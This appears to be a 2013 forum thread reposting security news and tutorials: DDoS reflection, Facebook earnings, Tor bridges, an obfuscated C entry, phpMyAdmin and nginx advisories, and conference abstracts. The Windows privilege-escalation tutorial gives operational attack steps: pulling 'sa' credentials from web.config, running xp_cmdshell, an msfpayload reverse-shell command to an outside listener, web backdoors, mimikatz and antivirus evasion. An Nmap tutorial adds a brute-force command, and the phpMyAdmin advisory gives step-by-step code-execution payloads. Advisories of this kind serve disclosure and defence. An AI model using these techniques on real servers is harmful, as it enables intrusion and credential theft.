Nytro

[h=1]Aging networking protocols abused in DDoS attacks[/h][h=2]Printers, routers and many other Internet-connected devices can be used in an attack[/h][h=3]By Jeremy Kirk[/h] May 01, 2013 — IDG News Service — Aging networking protocols still employed by nearly every Internet-connected device are being abused by hackers to conduct distributed denial-of-service (DDoS) attacks. Security vendor Prolexic found that attackers are increasingly using the protocols for what it terms "distributed reflection denial-of-service attacks" (DrDos), where a device is tricked into sending a high volume of traffic to a victim's network. "DrDos protocol reflection attacks are possible due to the inherent design of the original architecture," Prolexic wrote in a white paper. "When these protocols were developed, functionality was the main focus, not security." Government organizations, banks and companies are targeted by DDoS attacks for a variety of reasons. Hackers sometimes use DDoS attacks to draw attention away from other mischief or want to disrupt an organization for political or philosophical reasons. One of the targeted protocols, known as Network Time Protocol (NTP), is used in all major operating systems, network infrastructure and embedded devices, Prolexic wrote. It is used to synchronize clocks among computers and servers. A hacker can launch at attack against NTP by sending many requests for updates. By spoofing the origin of the requests, the NTP responses can be directed at a victim host. It appears the attackers are abusing a monitoring function in the protocol called NTP mode 7 (monlist). The gaming industry has been targeted by this style of attack, Prolexic said. Other network devices, such as printers, routers, IP video cameras and a variety of other Internet-connected equipment use an application layer protocol called Simple Network Management Protocol (SNMP). SNMP communicates data about device components, Prolexic wrote, such as measurements or sensor readings. SNMP devices return three times as much data as when they're pinged, making them an effective way to attack. Again, an attacker will send a spoofed IP request to an SNMP host, directing the response to a victim. Prolexic wrote there are numerous ways to mitigate an attack. The best advice is to disable SNMP if it is not needed. The U.S. Computer Emergency Readiness Team warned administrators in 1996 of a potential attack scenario involving another protocol, Character Generator Protocol, or CHARGEN. It is used as a debugging tool since it sends data back regardless of the input. But Prolexic wrote that it "may allow attackers to craft malicious network payloads and reflect them by spoofing the transmission source to effectively direct it to a target. This can result in traffic loops and service degradation with large amounts of network traffic." CERT recommended at that time to disable any UDP (User Datagram Protocol) service such as CHARGEN if it isn't needed. Sursa: Aging networking protocols abused in DDoS attacks - CSO Online - Security and Risk

[h=1]Facebook Q1 Earnings: Striking Mobile Revenue Growth[/h]May 1st, 2013, 20:37 GMT · By Gabriela Vatu Facebook has barely exceeded estimates and reported revenues of $1.458 billion (€1.105 billion) for the first quarter of 2013 and it also announced a 54% increase in mobile revenues. The company has published their first quarterly results of 2013. Overall, Facebook's revenues exceeded the $1.44 billion (€1.09 billion) estimates of Wall Street specialists. The social network also brought in over $751 million (€570 million) in mobile revenue in the first quarter, which is a 54% increase year-over-year. This has been extremely important to investors over the past year, so such an increase in this division is expected to cause a rise in stock prices for Facebook. Out of the company’s overall result for the first three months, 85% came from advertising. Facebook has managed to garner $1.25 billion (€0.94 billion) by selling ads, which is 43% more than last year. Mobile ads also played an important part, as they represented 30% of the total ad revenue, which is over Wall Street expectations. Facebook’s net income for the first quarter was of $219 million (€166 million), a small increase over last year’s results, when they had profits of $205 million (€155 million). The social network giant also announced that they have cash and marketable securities of $9.5 billion (€7.2 billion) at the end of the quarter. “We’ve made a lot of progress in the first few months of the year,” Mark Zuckerberg, Facebook CEO said at the conference. He continued by saying that they’ve seen strong growth and engagement across the community, as well as launched several exciting products. Facebook daily active users number also increased with 26% over the last year up to 665 million on average in March. The monthly active users number also grew significantly, reaching 1.11 billion. This represents a 23% increase over last year. David Spillane, Facebook’s Chief Accounting Officer has announced that he will be leaving the company. Sursa: Facebook Q1 Earnings: Striking Mobile Revenue Growth - Softpedia

http://www.youtube.com/watch?v=ghC_UCavA5o&feature=share

Super.

242 rows affected. ( Query took 0.0078 sec )

[h=3]Hacking Windows Servers - Privilege Escalation [/h] Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks. But, these get the job done only on Linux servers. What about windows servers? Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges. Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure. Using meterpreter payload to get a reverse shell over the target machine. Using browser_autopwn. (Really...) Using other tools like pwdump7, mimikatz, etc. Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above. 1. Using xp_cmdshell- Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work. If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website. You must be wondering why only "sa"? Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server. The picture below shows the connection string containing login credentials of "sa" account. Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path. So, after getting the "sa" account, we can login remotely using HeidiSQL HeidiSQL is an awesome tool to connect to remote database servers. You can download it here. After logging into MSSQL server with sa account, we get a list of databases and their contents. Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges) Syntax for the query is- xp_cmdshell '[command]' For example, if I need to know my current privileges, I would query- xp_cmdshell 'whoami' This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy. Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP. Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online. 2. Meterpreter Payload- This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands. Using metasploit, generate a reverse shell payload binary. For example- msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe Now we will upload this executable to the server using our web backdoor. Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly) Now it's time to execute the payload. If everything goes right, we will get a meterpreter session over the target machine as shown below- We can also use php, asp or other payloads. 3. Browser Autopwn- This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment. Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands. I think it is clear by now that what I'm trying to explain We can start Internet Explorer from command line and make it browse to a specific URL. Syntax for this- iexplore.exe Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection. 4. Using readily available tools- Tools like pwdump and mimikatz can crack passwords of windows users. #pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper. The following screenshot shows NTLM hashes from pwdump7: #mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it. Following picture shows plain text passwords from mimikatz: You can google about them and learn how to use these tools and what actually they exploit to get the job done for you. I hope you can now exploit every another windows server. Happy Hacking About The Author This article has been written by Deepankar Arora, He is an independent security researcher from India, He has been listed in various hall of fames. Sursa: Hacking Windows Servers - Privilege Escalation | Learn How To Hack - Ethical Hacking and security tips

[h=1]Tor calls for help as its supply of bridges falters[/h][h=2]Bridges help users in countries like China and Iran access the network.[/h] by Sean Gallagher - Apr 17 2013, 7:23pm GTBDT Just like the US highway infrastructure, Tor needs new bridges. The encrypted anonymizing "darknet" that allows activists, journalists, and others to access the Internet without fear of censorship or monitoring—and which has also become a favored technology of underground groups like child pornographers—is having increasing difficulty serving its users in countries that have blocked access to Tor's entry points. Tor bridges are computers that act as hidden gateways to Tor's darknet of relays. After campaigning successfully last year to get more volunteers to run obfuscated Tor bridges to support users in Iran trying to evade state monitoring, the network has lost most of those bridges, according to a message to the Tor relays mailing list by Tor volunteer George Kadiankakis. "Most of those bridges are down, and fresh ones are needed more than ever," Kadiankakis wrote in an e-mail, "since obfuscated bridges are the only way for people to access Tor in some areas of the world (like China, Iran, and Syria)." Obfuscated bridges allow users to connect to the Tor network without using one of the network's known public bridges or relays as an initial entry point. Obfuscated bridges have become a necessity for Tor users in countries with networks guarded by various forms of deep packet inspection technology, where censors have put in place filters that spot traffic matching the signature of a Tor-protected connection. Some of these censors use a blocking list for traffic to known Tor bridges. To circumvent detection, Tor users can use a plugin called a "pluggable transport" to connect to an obfuscated bridge and mask their network signature. To further evade potential censoring, the addresses for obfuscated bridges are not part of Tor's main directory but are stored in a distributed database called BridgeDB. The BridgeDB's interface spoons out addresses two at a time per request in an effort to prevent attacks to expose a full list, and no BridgeDB instance keeps a full list of the available bridges. Additionally, Tor provides "unpublished" bridge addresses to users who request them via e-mail. The Tor Project's support assistants—volunteers who respond to support requests—only respond to requests to e-mails from Gmail and Yahoo e-mail accounts to both deal with the flood of requests and reduce the chance that an attacker will be able to learn the addresses of a large number of bridges. The problem for Tor is that those bridges do get detected by attackers over time, and pluggable transports can eventually be detected. The most widely used pluggable transport in the Tor network, obfs2, no longer works in China. A new plugin, obfs3, will work in China, but it runs only on the latest version of the obfuscated bridge proxy—which was recently rewritten in Python. "Looking into BridgeDB," Kadiankakis wrote in his message to the Tor community, "we have 200 obfs2 bridges, but only 40 obfs3 bridges: this means that we need more people running the new Python obfsproxy! Upgrading obfsproxy should be easy now, since we prepared new instructions and Debian/Ubuntu packages." He added that there is also a particular need for more unpublished bridges. For those who want to donate bridges to the Tor network, the easiest route is to use Tor Cloud, an Amazon Web Service Elastic Compute Cloud image created by the Tor Project that allows people to leverage Amazon's free usage tier to deploy a bridge. Sursa: http://arstechnica.com/information-technology/2013/04/tor-calls-for-help-as-its-supply-of-bridges-falters/

[C] Love letter (obfuscated C contest 1990) char*lie; double time, me= !0XFACE, not; int rested, get, out; main(ly, die) char ly, **die ;{ signed char lotte, dear; (char)lotte--; for(get= !me;; not){ 1 - out & out ;lie;{ char lotte, my= dear, **let= !!me *!not+ ++die; (char*)(lie= "The gloves are OFF this time, I detest you, snot\n\0sed GEEK!"); do {not= *lie++ & 0xF00L* !me; #define love (char*)lie - love 1s *!(not= atoi(let [get -me? (char)lotte- (char)lotte: my- *love - 'I' - *love - 'U' - 'I' - (long) - 4 - 'U' ])- !! (time =out= 'a'));} while( my - dear && 'I'-1l -get- 'a'); break;}} (char)*lie++; (char)*lie++, (char)*lie++; hell:0, (char)*lie; get *out* (short)ly -0-'R'- get- 'a'^rested; do {auto*eroticism, that; puts(*( out - 'c' -('P'-'S') +die+ -2 ));}while(!"you're at it"); for (*((char*)&lotte)^= (char)lotte; (love ly) [(char)++lotte+ !!0xBABE]{ if ('I' -lie[ 2 +(char)lotte]){ 'I'-1l ***die; } else{ if ('I' * get *out* ('I'-1l **die[ 2 ])) *((char*)&lotte) -= '4' - ('I'-1l); not; for(get=! get; !out; (char)*lie & 0xD0- !not) return!! (char)lotte;} (char)lotte; do{ not* putchar(lie [out *!not* !!me +(char)lotte]); not; for(;!'a';}while( love (char*)lie);{ register this; switch( (char)lie [(char)lotte] -1s *!out) { char*les, get= 0xFF, my; case' ': *((char*)&lotte) += 15; !not +(char)*lie*'s'; this +1s+ not; default: 0xF +(char*)lie;}}} get - !out; if (not--) goto hell; exit( (char)lotte);} Sursa: http://www0.us.ioccc.org/1990/westley.c PS: E posibil sa primiti o eroare cu invalid suffix "s". Puneti si voi "L" sau "5" in locul acelui "s".

Pen Testing SQL Servers With Nmap The Nmap Scripting Engine has transform Nmap from a regular port scanner to a penetration testing machine.With the variety of the scripts that exists so far we can even perform a full penetration test to an SQL database without the need of any other tool.In this tutorial we will have a look in these scripts,what kind of information these extract from the database and how we can exploit the SQL server and execute system commands through Nmap. Most SQL databases run on port 1433 so in order to discover information regarding the database we need to execute the following script: Obtain SQL Information – Nmap So we already have the database version and the instance name.The next step is to check whether there is a weak password for authentication with the database.In order to achieve that we need to run the following nmap script which it will perform a brute force attack. Brute Force Weak MS-SQL Accounts – Nmap As we can see in this case we didn’t discover any credentials.If we want we can use this script with our own username and password lists in order to discover a valid database account with this command: nmap -p1433 –script ms-sql-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt However we can always try another script which can check for the existence of null passwords on Microsoft SQL Servers. Check For Null passwords on SA accounts – Nmap Now we know that the sa account has not a password.We can use this information in order to connect with the database directly or to continue to execute further Nmap scripts that require valid credentials.If we want to know in which databases the sa account has access to or any other account that we have discovered we can run the ms-sql-hasdbaccess script with the following arguments: Discover which user has access to which db – Nmap We can even query the Microsoft SQL Server via Nmap in order to obtain the database tables. List Tables – Nmap In 2000 version of SQL Server xp_cmdshell is enabled by default so we can even execute operating system commands through Nmap scripts as it can be seen in the image below: Run OS command via xp_cmdshell – Nmap Run net users via xp_cmdshell – Nmap Last but not least we can run a script to extract the database password hashes for cracking with tools like john the ripper. Dump MS-SQL hashes – Nmap In this case we didn’t have any hashes because there was only one account on the database the sa which has null password. Sursa: Pen Testing SQL Servers With Nmap | Penetration Testing Lab

PeStudio [TABLE=class: fborder] [TR] [TD=class: fcaption, colspan: 2, align: left]PeStudio 6.70 [/TD] [/TR] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Marc Ochsenmeier[/TD] [/TR] [TR] [TD=class: forumheader3]Author email[/TD] [TD=class: forumheader3] info©winitor.com[/TD] [/TR] [TR] [TD=class: forumheader3]Author website[/TD] [TD=class: forumheader3]winitor[/TD] [/TR] [TR] [TD=class: forumheader3]Description[/TD] [TD=class: forumheader3]PeStudio is a free tool which can be used to perform static analysis of any Windows application and reveals not only Raw-data, but also Indicators of Trust. Executable files analyzed with PeStudio are never started. For this reason, you can analyze suspicious applications with PeStudio with no risk! Depending on how it is started PeStudio has a Graphical User Interface (GUI) or a Character-Based User Interface (CUI), which is especially useful when performing batch-mode oriented parsing of executable files. PeStudio has a set of unique features like looking-up for the image being analyzed on Virustotal, the possibility to start new instances of PeStudio with the dependencies of the image. PeStudio does a RAW access to the data of the Windows Portable Executable format. No Windows API is used to gather elements. A feature which is also unique to PeStudio is the ability to create an XML report of the image being analyzed.[/TD] [/TR] [TR] [TD=class: forumheader3]Image[/TD] [TD=class: forumheader3]no image available [/TD] [/TR] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]380 kB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 23 April 2013 - 08:56:45[/TD] [/TR] [TR] [TD=class: forumheader3]Downloads[/TD] [TD=class: forumheader3]86[/TD] [/TR] [TR] [TD=class: forumheader3]Download[/TD] [TD=class: forumheader3] [/TD] [/TR] [/TABLE] Sursa: PeStudio 6.70 / Portable Executable Tools / Downloads - Tuts 4 You

[h=1]phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities[/h] [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin =============================================================================== Author: Janek Vind "waraxe" Date: 25. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-103.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. http://www.phpmyadmin.net/home_page/index.php ############################################################################### 1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php" ############################################################################### Reason: 1. insufficient sanitization of user data before using in preg_replace Attack vectors: 1. user-supplied parameters "from_prefix" and "to_prefix" Preconditions: 1. logged in as valid PMA user 2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex) PMA security advisory: PMASA-2013-2 CVE id: CVE-2013-3238 Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2 Result: PMA user is able to execute arbitrary PHP code on webserver Let's take a look at the source code: Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8): ------------------------[ source code start ]---------------------------------- case 'replace_prefix_tbl': $current = $selected[$i]; $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current); $a_query = 'ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' . PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN $run_parts = true; break; case 'copy_tbl_change_prefix': $current = $selected[$i]; $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current); $a_query = 'CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM ' . PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN $run_parts = true; break; ------------------------[ source code end ]------------------------------------ We can see, that PHP variables "$from_prefix" and "$to_prefix" are used in preg_replace function without any sanitization. It appears, that those variables are coming from user submitted POST request as parameters "from_prefix" and "to_prefix". It is possible to inject e-modifier with terminating null byte via first parameter and php code via second parameter. In case of successful exploitation injected PHP code will be executed on PMA webserver. Tests: 1. Log in to PMA and select database: http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8 2. select one table from database by using checkbox and then select "Replace table prefix" from select control "With selected:". 3. We can see form named "Replace table prefix:" with two input fields. Type "/e%00" to the "From" field and "phpinfo()" to the "To" field. 4. Activate Tamper Data Firefox add-on: https://addons.mozilla.org/en-us/firefox/addon/tamper-data/ 5. Click "Submit", Tamper Data pops up, choose "Tamper". 6. Now we can modify POST request. Look for parameter "from_prefix". It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00". Click "OK" and Firefox will send out manipulated POST request. 7. We are greeted by phpinfo function output - code execution is confirmed. PMA version 4.0.0-RC2 contains almost identical vulnerability: Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2): ------------------------[ source code start ]---------------------------------- case 'replace_prefix_tbl': $current = $selected[$i]; $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current); $a_query = 'ALTER TABLE ' . PMA_Util::backquote($selected[$i]) . ' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN $run_parts = true; break; case 'copy_tbl_change_prefix': $current = $selected[$i]; $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current); $a_query = 'CREATE TABLE ' . PMA_Util::backquote($newtablename) . ' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN $run_parts = true; break; ------------------------[ source code end ]------------------------------------ ############################################################################ 2. Locally Saved SQL Dump File Multiple File Extension Remote Code Execution ############################################################################ Reason: 1. insecure names of locally saved dump files Attack vectors: 1. user-supplied POST parameter "filename_template" Preconditions: 1. logged in as valid PMA user 2. configuration setting "SaveDir" defined and pointed to directory, which is writable for php and directly accessible over web (by default "SaveDir" is empty and PMA is secure) 3. Apache webserver with unknown MIME for "sql" extension PMA security advisory: PMASA-2013-3 CVE id: CVE-2013-3239 Affected are PMA versions 3.5.8 and 4.0.0-RC2 There is a security weakness in a way, how PMA handles locally saved database dump files. It is possible, that saved dump file has multiple extensions and if Apache webserver does not know MIME type of "sql" extension (that's how it is by default), then for example "foobar.php.sql" file will be treated as php file. More information: http://httpd.apache.org/docs/2.2/mod/mod_mime.html section "Files with Multiple Extensions" http://www.acunetix.com/websitesecurity/upload-forms-threat/ section "Case 4: Double extensions (part 1)" Test: 1. activate export to local server, be sure, that directory is writable: $cfg['SaveDir'] = './'; 2. select database for test, insert row into table with included php code like "<?php phpinfo();?>" 3. try to export that database or table, you have now additional option: "Save on server in the directory ./" Confirm that option, let the format be as "SQL". "File name template" change to "@DATABASE () php" and click "Go" button. Server responds with "Dump has been saved to file ./test.php.sql." 4. Request created file with webbrowser: http://localhost/PMA/test.php.sql In case of success we can see output of phpinfo() function, which confirms remote code execution. ############################################################################### 3. Local File Inclusion in "export.php" ############################################################################### Reason: 1. insufficient sanitization of user data before using in include_once Attack vectors: 1. user-supplied POST parameter "what" Preconditions: 1. logged in as valid PMA user 2. PHP must be < 5.3.4 for null-byte attacks to work PMA security advisory: PMASA-2013-4 CVE id: CVE-2013-3240 Affected is PMA version 4.0.0-RC2 Php script "export.php" line 20: ------------------------[ source code start ]---------------------------------- foreach ($_POST as $one_post_param => $one_post_value) { $GLOBALS[$one_post_param] = $one_post_value; } PMA_Util::checkParameters(array('what', 'export_type')); // export class instance, not array of properties, as before $export_plugin = PMA_getPlugin( "export", $what, 'libraries/plugins/export/', array( 'export_type' => $export_type, 'single_table' => isset($single_table) ) ); ------------------------[ source code end ]------------------------------------ We can see, that user-supplied parameter "what" is used as second argument for the function PMA_getPlugin(). Let's follow execution flow: Php script "libraries/plugin_interface.lib.php" line 20: ------------------------[ source code start ]---------------------------------- function PMA_getPlugin( $plugin_type, $plugin_format, $plugins_dir, $plugin_param = false ) { $GLOBALS['plugin_param'] = $plugin_param; $class_name = strtoupper($plugin_type[0]) . strtolower(substr($plugin_type, 1)) . strtoupper($plugin_format[0]) . strtolower(substr($plugin_format, 1)); $file = $class_name . ".class.php"; if (is_file($plugins_dir . $file)) { include_once $plugins_dir . $file; ------------------------[ source code end ]------------------------------------ As seen above, second argument "$plugin_format" is used in variable "$file" and after that in functions is_file() and include_once(). No sanitization is used against user submitted parameter "what", which leads to directory traversal and local file inclusion vulnerability. In case of older PHP version it may be possible to use null byte attack and include arbitrary files on server. ############################################################################### 4. $GLOBALS array overwrite in "export.php" ############################################################################### Reason: 1. insecure POST parameters importing Attack vectors: 1. user-supplied POST parameters Preconditions: 1. logged in as valid PMA user PMA security advisory: PMASA-2013-5 CVE id: CVE-2013-3241 Affected is PMA version 4.0.0-RC2 Php script "export.php" line 20: ------------------------[ source code start ]---------------------------------- foreach ($_POST as $one_post_param => $one_post_value) { $GLOBALS[$one_post_param] = $one_post_value; } PMA_Util::checkParameters(array('what', 'export_type')); ------------------------[ source code end ]------------------------------------ We can see, that arbitrary values in $GLOBALS array can be overwritten by submitting POST parameters. Such way of input data importing can be considered as very insecure and in specific situation it is possible to overwrite any variable in global scope. This can lead to many ways of exploitation. Below is presented one of the possibilities. Php script "export.php" line 59: ------------------------[ source code start ]---------------------------------- $onserver = false; $save_on_server = false; ... if ($quick_export) { $onserver = $_REQUEST['quick_export_onserver']; } else { $onserver = $_REQUEST['onserver']; } // Will we save dump on server? $save_on_server = ! empty($cfg['SaveDir']) && $onserver; ... // Open file on server if needed if ($save_on_server) { $save_filename = PMA_Util::userDir($cfg['SaveDir']) . preg_replace('@[/\\\\]@', '_', $filename); ... if (! $file_handle = @fopen($save_filename, 'w')) { $message = PMA_Message::error( ... /* If we saved on server, we have to close file now */ if ($save_on_server) { $write_result = @fwrite($file_handle, $dump_buffer); fclose($file_handle); ------------------------[ source code end ]------------------------------------ As seen above, when configuration setting "SaveDir" is set, then it is possible to save database dump to the PMA webserver. By default "SaveDir" is unset and this prevents possible security problems. As we can overwrite any variables in global scope, it is possible to set "SaveDir" to arbitrary value. This will lead to directory traversal vulnerability - attacker is able to save database dump to any directory in webserver, if only filesystem permissions allow that. Database dump can be with extension ".sql". If attacker can dump database with php code and tags in it, this content will be in dump file. If filename is something like "foobar.php.sql", then by default most Apache webserver installations will try to parse this dump file as php file, which can finally lead to the remote code execution vulnerability. Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 16.04.2013 -> Sent email to developers 16.04.2013 -> First response email from developers 16.04.2013 -> Sent detailed information to developers 24.04.2013 -> New PMA versions and security advisories released 25.04.2013 -> Current advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe () yahoo com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------ Sursa: phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities

Hitb 2012 - Defibrilating Web Security Description: PRESENTATION ABSTRACT: Whether you are a consultant or a software engineer, you have probably realized by now that we're not really making a lot of progress on server-side web security. Consultants benefit from the resulting job security and developers want to focus on building awesome technology without spending a lot of time and energy building reusable security solutions, which are hard. Come and hear about the fallacies of the current approaches and a couple of ideas no how to address some of them. Among other things, this talk will introduce you to contextual runtime taint tracking system with PoCs in Java and Ruby. ABOUT MEDER KYDYRALIEV Meder has been working in the area of application security for nearly a decade. He's poked at, broken, and helped fix a lot of code businesses and parts of the Internet depends on (Struts2, JBoss Seam, Google Web Toolkit, and Ruby on Rails, to name a few). Some of the things that excite him include: karaoke, server-side security, kumys and making software security easier. Sursa: Hitb 2012 - Defibrilating Web Security

Hitb 2012 - Hackers The Movie: A Retrospective Description: PRESENTATION ABSTRACT: In this lecture, Don A. Bailey will take a look back at another great milestone in information security: the movie Hackers. In this retrospective, Don will analyze every "hack" implemented in the cult classic and demonstrate how in modern day these attacks are even more relevant, realistic, and cost effective. Don will discuss the exact technologies used in modern day versions of these exploits and what tactical requirements are no longer glass ceilings for attackers. Mr. Bailey will also provide demonstrations that show low cost and creative ways to bypass physical security controls. Using simple, modern, and sometimes even even rudimentary technology, demonstrations will show that no matter how complex a security control may be there is always a fast and effective bypass. Oh, and by the way... Hack the Planet. ABOUT DON BAILEY Don A. Bailey is an internationally respected security researcher known for breaking ground in the mobile and embedded security spaces. Don has given over thirty unique lectures on various advances in security technology over the last eight years, both around the world and within the United States. His research has been highlighted on news exchanges such as CNN, Reuters, NPR, BBC, FOX, and CBS. Don was recently featured in the IEEE Security & Privacy magazine for his recent work reverse engineering M2M systems such as vehicle security modules. Previously the Research Director for a prestigious security firm, Mr. Bailey recently founded the consulting and engineering organization Capitol Hill Consultants LLC. At CHC, Don focuses on government contracting, global defense-centric engagements, and mobile security consulting. Sursa: Hitb 2012 - Hackers The Movie: A Retrospective

Hitb 2012 - A. Barisani And D. Bianco - Practical Exploitation Of Embedded Systems Description: PRESENTATION ABSTRACT: For the 10th anniversary of HITB we keep it old school with an in-depth exploration of the reverse engineering and exploitation of embedded systems. We will cover hardware by showing how to identify and probe debugging and I/O ports on undocumented circuit board layouts. We will cover software by exploring the analysis, reverse engineer and binary patching techniques for obscure real time OSes and firmware images with real world examples. We are also going to address the post compromise art of debugging and patching running live kernels with custom backdoors or interception code. At least one Apple laptop embedded subsystem will be harmed during the course of the presentation. ABOUT ANDREA BARISANI Andrea Barisani is an internationally known security researcher. Since owning his first Commodore-64 he has never stopped studying new technologies, developing unconventional attack vectors and exploring what makes things tick...and break. His experiences focus on large-scale infrastructure administration and defense, forensic analysis, penetration testing and software development, with more than 10 years of professional experience in security consulting. Being an active member of the international Open Source and security community he contributed to several projects, books and open standards. He is now the founder and coordinator of the oCERT effort, the Open Source Computer Security Incident Response Team. He has been a speaker and trainer at BlackHat, CanSecWest, DEFCON, Hack In The Box, PacSec conferences among many others, speaking about TEMPEST attacks, SatNav hacking, 0-days, OS hardening and many other topics. ABOUT DANIELE BIANCO He began his professional career during his early years at university as system administrator and IT consultant for several scientific organizations. His interest for centralized management and software integration in Open Source environments has focused his work on design and development of suitable R&D infrastructure. One of his hobbies has always been playing with hardware and electronic devices. At the time being he is the resident Hardware Hacker for international consultancy Inverse Path where his research work focuses on embedded systems security, electronic devices protection and tamperproofing techniques. He presented at many IT security events and his works have been quoted by numerous popular media. Sursa: Hitb 2012 - A. Barisani And D. Bianco - Practical Exploitation Of Embedded Systems

Social Engineering – Art Of Human Brain Manipulation Description: Talk: SOCIAL ENGINEERING – Art of human brain manipulation Speaker: Muhammed Sherif Abstract: Social engineering is a common thing what we do among our friends, relatives etc.. .Its all about gaining information of a person ,Which sounds “not so bad” in REAL LIFE. But it can be much dangerous when it come to the cyberspace . Social Engineering is a divine art of manipulating the Human brains to reveal the confidential information which can be used to attack themselves.Its a trickery process for information gathering .The attacks like Pretexting,Web phishing,IVR (Interactive Voice Responses) or Phone phishing ,Baiting,Something for something,Piggybacking etc …. . Sursa: Social Engineering – Art Of Human Brain Manipulation

Android Forensics Description: Talk: Android Forensics Speaker: Nikhalesh Singh Bhadroia Android is currently the world’s most popular smartphone operating system it’s already over 72 percent of market. This kind of popularity traditionally draws the eye of security researchers and attackers alike. Android presents a number of challenges to forensic practitioners. so here i’am providing Forensic Techniques. Sursa: Android Forensics

Hacking IPv6 Networks Authored by Fernando Gont These are the slides for the "Hacking IPv6 Networks" security training course as given at BRUCON 2012. Download: http://packetstormsecurity.com/files/download/121415/fgont-brucon2012-hacking-ipv6-networks-training.pdf Sursa: Hacking IPv6 Networks ? Packet Storm

nginx Integer Overflow Authored by Safe3 | Site safe3.com.cn Qihoo 360 Web Security Research Team discovered a critical vulnerability in nginx. The vulnerability is caused by a integer overflow error within the Nginx ngx_http_close_connection function when r->count is less then 0 or more then 255, which could be exploited by remote attackers to compromise a vulnerable system via malicious http requests. Website: http://safe3.com.cn I. BACKGROUND --------------------- Nginx is an HTTP and reverse proxy server, as well as a mail proxy server, written by Igor Sysoev. For a long time, it has been running on many heavily loaded Russian sites including Yandex, Mail.Ru, VKontakte, and Rambler. According to Netcraft nginx served or proxied 12.96% busiest sites in April 2013. Here are some of the success stories: Netflix, Wordpress.com, FastMail.FM. II. DESCRIPTION --------------------- Qihoo 360 Web Security Research Team discovered a critical vulnerability in nginx. The vulnerability is caused by a int overflow error within the Nginx ngx_http_close_connection function when r->count is less then 0 or more then 255, which could be exploited by remote attackers to compromise a vulnerable system via malicious http requests. III. AFFECTED PRODUCTS --------------------------- Nginx all latest version IV. Exploits/PoCs --------------------------------------- In-depth technical analysis of the vulnerability and a fully functional remote code execution exploit are available through the safe3q@gmail.com In src\http\ngx_http_request_body.c ngx_http_discard_request_body function,we can make r->count++. V. VUPEN Threat Protection Program ----------------------------------- VI. SOLUTION ---------------- Validate the r->count input. VII. CREDIT -------------- This vulnerability was discovered by Safe3 of Qihoo 360. VIII. ABOUT Qihoo 360 --------------------------- Qihoo 360 is the leading provider of defensive and offensive web cloud security of China. IX. REFERENCES ---------------------- http://nginx.org/en/ Sursa: nginx Integer Overflow ? Packet Storm

